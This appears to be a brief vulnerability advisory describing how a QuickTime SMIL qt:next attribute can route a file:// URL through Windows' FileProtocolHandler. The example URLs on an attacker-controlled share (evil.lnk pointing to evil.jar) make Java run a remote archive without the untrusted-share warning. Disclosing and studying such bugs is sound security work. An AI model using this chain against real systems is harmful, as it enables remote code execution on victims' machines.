The attack vectors for this bug is the access to malicious NetBIOS share is not filtered. So hypothetically all the applications which sends user-supplied file:// protocol URLs to FileProtocolHandler is vulnerable to the same attack.
rundll32 url.dll,FileProtocolHandler URL
QuickTime SMIL file, hosted at a malicious site, is the begin of the story. An attribute, called qt:next, within the SMIL file will instruct the QuickTime player to play the next mp3 file. This attribute can point to protocol handler such as http:// or file://
If the following URL is passed to the FileProtocolHandler using the attribute above:
file://172.16.3.124/evil/evil.lnk
And the content of the evil.lnk is point to the following JAR file:
\\172.16.3.124\evil\evil.jar
Then it will bypass the following Windows protection and cause Java interpreter to execute the mailious JAR archive.
- XP SP1 and above will warn user that an application is launched from an untrusted share.
- This applies to all the executable extensions such as exe, .bat, .cmd, .vbs, .js, .application and other known executable file formats.
References: